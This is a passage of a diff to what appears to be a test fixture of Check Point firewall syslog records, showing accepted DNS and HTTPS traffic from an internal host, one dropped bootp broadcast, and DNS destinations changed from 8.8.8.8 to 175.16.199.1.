FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53773"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60019"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57758"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52756"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38792"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40870"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40870"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e50f,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; 
service_id:"bootp"; src:"0.0.0.0"] -<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47318"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54729"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54394"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47318"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54729"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505550"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54394"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:12:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58910"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50e,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"32852"; service:"443"; service_id:"https"; src:"192.168.2.2"] 
-<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37891"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43458"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37891"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43458"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38166"; service:"443"; service_id:"https"; 
src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33949"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45569"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40393"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33949"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45569"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40393"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e510,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50552"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e511,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
